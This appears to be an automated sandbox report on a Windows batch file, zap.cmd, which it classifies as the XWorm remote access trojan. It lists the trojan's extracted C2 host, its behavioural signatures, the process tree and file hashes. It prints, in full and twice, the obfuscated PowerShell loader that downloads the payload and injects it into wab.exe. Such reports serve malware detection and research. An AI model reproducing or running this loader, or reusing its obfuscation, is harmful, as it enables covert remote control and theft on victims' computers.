Overview

overview

10

Static

static

1

zap.cmd

windows7-x64

10

zap.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 16:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    zap.cmd

  • Size

    6KB

  • MD5

    0b65dcbdc755a516181f47d69f5aee10

  • SHA1

    fc9319ec254c2be1b7ba5174d36d142c1ce20440

  • SHA256

    00c866d489bd11732441171441b8db0a135c76bdb7bf5c3adb4da66e97dbed43

  • SHA512

    e37aba32337a5bf8793721d8d9b9582c906b9820ace2a831d1f6e9548e6631942df0bdf6b56f07c1420fa7ade2d3a1e34bb27cab4ddc7d57a42672919f1ead1c

  • SSDEEP

    96:vEWuwXqdcs0faFF/oW8NYEpyGakOwJyZLLi8lTxd7Qhn004g6bnecFhZ3WjS:vurF8NY8yGywAL2Ox5QV004gIFhn

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

xgmn934.duckdns.org:8896

Mutex

2utLZrxcByvppTdF

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zap.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4032
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
        3⤵
          PID:3248
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3436
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
            4⤵
              PID:1888
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:4732

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_op0yz45x.xyz.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Belejringstilstandenes.Unj
        Filesize

        465KB

        MD5

        61708c02a92801dea7267daf2300d321

        SHA1

        5414b3aed956e83fb5f196f44ce5888dcfd6e4a9

        SHA256

        3b1e99b27d0ac212ee8597aa77c4f3d242a198c06cbf5fc536b0e635a9f203f7

        SHA512

        5787bc03913eac9e7082657d2420e66ed0e7a481e75cccad7f077ee347146ccce06534ed8f7e5105895f9c4e3e011f74fdcd03088eee5736713bc09bb9c3fe85

        Download Submit
      • memory/3436-45-0x0000000006670000-0x000000000668A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/3436-56-0x00000000746E0000-0x0000000074E90000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/3436-57-0x00000000746E0000-0x0000000074E90000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/3436-46-0x0000000007370000-0x0000000007406000-memory.dmp
        Filesize

        600KB

        Download
      • memory/3436-24-0x00000000746EE000-0x00000000746EF000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3436-47-0x0000000007300000-0x0000000007322000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3436-26-0x00000000746E0000-0x0000000074E90000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/3436-27-0x0000000005450000-0x0000000005A78000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/3436-28-0x00000000746E0000-0x0000000074E90000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/3436-29-0x00000000051F0000-0x0000000005212000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3436-30-0x0000000005390000-0x00000000053F6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3436-31-0x0000000005AF0000-0x0000000005B56000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3436-41-0x0000000005CE0000-0x0000000006034000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/3436-42-0x00000000060C0000-0x00000000060DE000-memory.dmp
        Filesize

        120KB

        Download
      • memory/3436-43-0x0000000006100000-0x000000000614C000-memory.dmp
        Filesize

        304KB

        Download
      • memory/3436-44-0x0000000007910000-0x0000000007F8A000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/3436-55-0x00000000746EE000-0x00000000746EF000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3436-51-0x0000000008AF0000-0x000000000E8C9000-memory.dmp
        Filesize

        93.8MB

        Download
      • memory/3436-25-0x00000000027F0000-0x0000000002826000-memory.dmp
        Filesize

        216KB

        Download
      • memory/3436-48-0x0000000008540000-0x0000000008AE4000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/4032-13-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4032-79-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4032-15-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4032-14-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4032-53-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4032-3-0x000002A8F8B50000-0x000002A8F8B72000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4032-50-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4032-52-0x00007FFCFA0A3000-0x00007FFCFA0A5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4032-2-0x00007FFCFA0A3000-0x00007FFCFA0A5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4732-64-0x0000000001070000-0x00000000022C4000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/4732-76-0x00000000254E0000-0x000000002557C000-memory.dmp
        Filesize

        624KB

        Download
      • memory/4732-74-0x0000000001070000-0x00000000022C4000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/4732-75-0x0000000001070000-0x000000000107E000-memory.dmp
        Filesize

        56KB

        Download
      • memory/4732-80-0x00000000258D0000-0x0000000025962000-memory.dmp
        Filesize

        584KB

        Download
      • memory/4732-81-0x00000000255C0000-0x00000000255CA000-memory.dmp
        Filesize

        40KB

        Download